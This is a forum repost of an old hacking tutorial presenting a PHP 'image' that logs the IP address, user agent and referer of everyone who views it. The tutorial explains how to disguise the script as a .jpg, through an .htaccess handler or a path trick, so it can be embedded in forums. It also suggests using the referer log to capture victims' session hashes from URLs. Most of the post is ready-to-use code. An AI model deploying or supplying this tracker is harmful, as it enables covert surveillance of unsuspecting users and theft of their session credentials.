This is an old tutorial I had saved from older boards, this member was pretty active and knowledgeable back then, but after the fall of 1nj3ct, he went someplace and I haven't seen him since then. I couldn't contact him either, would be pretty nice if he could come back
Anyway, this is an old tutorial, so I'm sure he wouldn't mind me posting it.
.:Intro:.
Written by t3hmadhatt3r -- Contact me at t3hmadhatt3r@gmail.com.
Hello mates. I have been working on a method of getting IP's and other info using the GD library.
.:The Code:.
Ok first we will use the GD library in php to generate a valid image in php. Here's some code to do just that:
<?php
/*
.:Made by t3hmadhtt3r -- t3hmadhatt3r@gmail.com:.
.:Please don't share! Keep this quiet!:.
.:Please be safe:.
.:Enjoy!:.
*/
// Defining Variables
$IP = $_SERVER['REMOTE_ADDR']; // Saves the IP
$UA = $_SERVER['HTTP_USER_AGENT']; // Saves the User Agent
$RE = $_SERVER['HTTP_REFERER']; // Saves the Referer
$DATE = date('l jS \of F Y h:i:s A');
$DATA = '<p>IP: '.$IP.'<br/><p>User Agent: '.$UA.'<br/><p>Referer: '.$RE.'<br/><p>Date: '.$DATE.'<br/><br/><br/>';
/*PS: Try using the referer logging feature to exploit forums and sites that keep useful info in the URL. Example: HTTP://WWW.LAMESITE.COM/POST.PHP?ID=4&HASH=(THE VICTIMS MD5 HASH)&USER=t3hmadhatt3r*/
// Writing the logs
$fp = fopen('Cool_Huh?.html', 'a');
fwrite($fp, $DATA);
fclose($fp);
// Behold the mighty GD Library ^_^
header("Content-type: image/png");
$img = ImageCreate (1, 1);
$bg = ImageColorAllocate ($img, 0, 0, 0);
$txt = ImageColorAllocate ($img, 0, 0, 0);
ImagePng($img);
// Later...
?>
More Info about that PHP GD library at
http://us2.php.net/manual/en/book.image.php.:Faking the Extension:.
Now we have a valid image but, how will we get it to work on forums that dont allow php as a image extension? Well there are two ways. One which is better than the other.
1. .htaccess (This is the best way)
If you are using a server that allows you to configure your own .htaccess file than you can add the following line to execute all files with the .jpg extension as a php file.
AddHandler application/x-httpd-php .jpg
Note: If you dont have a server that allows this I recommend looking at
http://www.free-webhosts.com/search-webhosts.php?SA=.htaccess.
Now you can rename the php file to jpg and it will still work! Tricky Aye?
2. Tricky Technique (This way works just the same but is suspicious)
This technique can be done on most servers (I tried it on t35 and got some Permission errors... Probably because of the Jail Shell) but, It could get some attention from a admin pretty quickly. Just add a /image.jpg to the end of the PHP file.
Example:
http://subdomain.whatever.com/script.php/image.jpgThis will make it look like the extension is jpg but the php will ignore it and execute normally.
.:Ending:.
Now you can embed this image in forums just like any other image.
Enjoy the code!
-- t3hmadhatt3r;
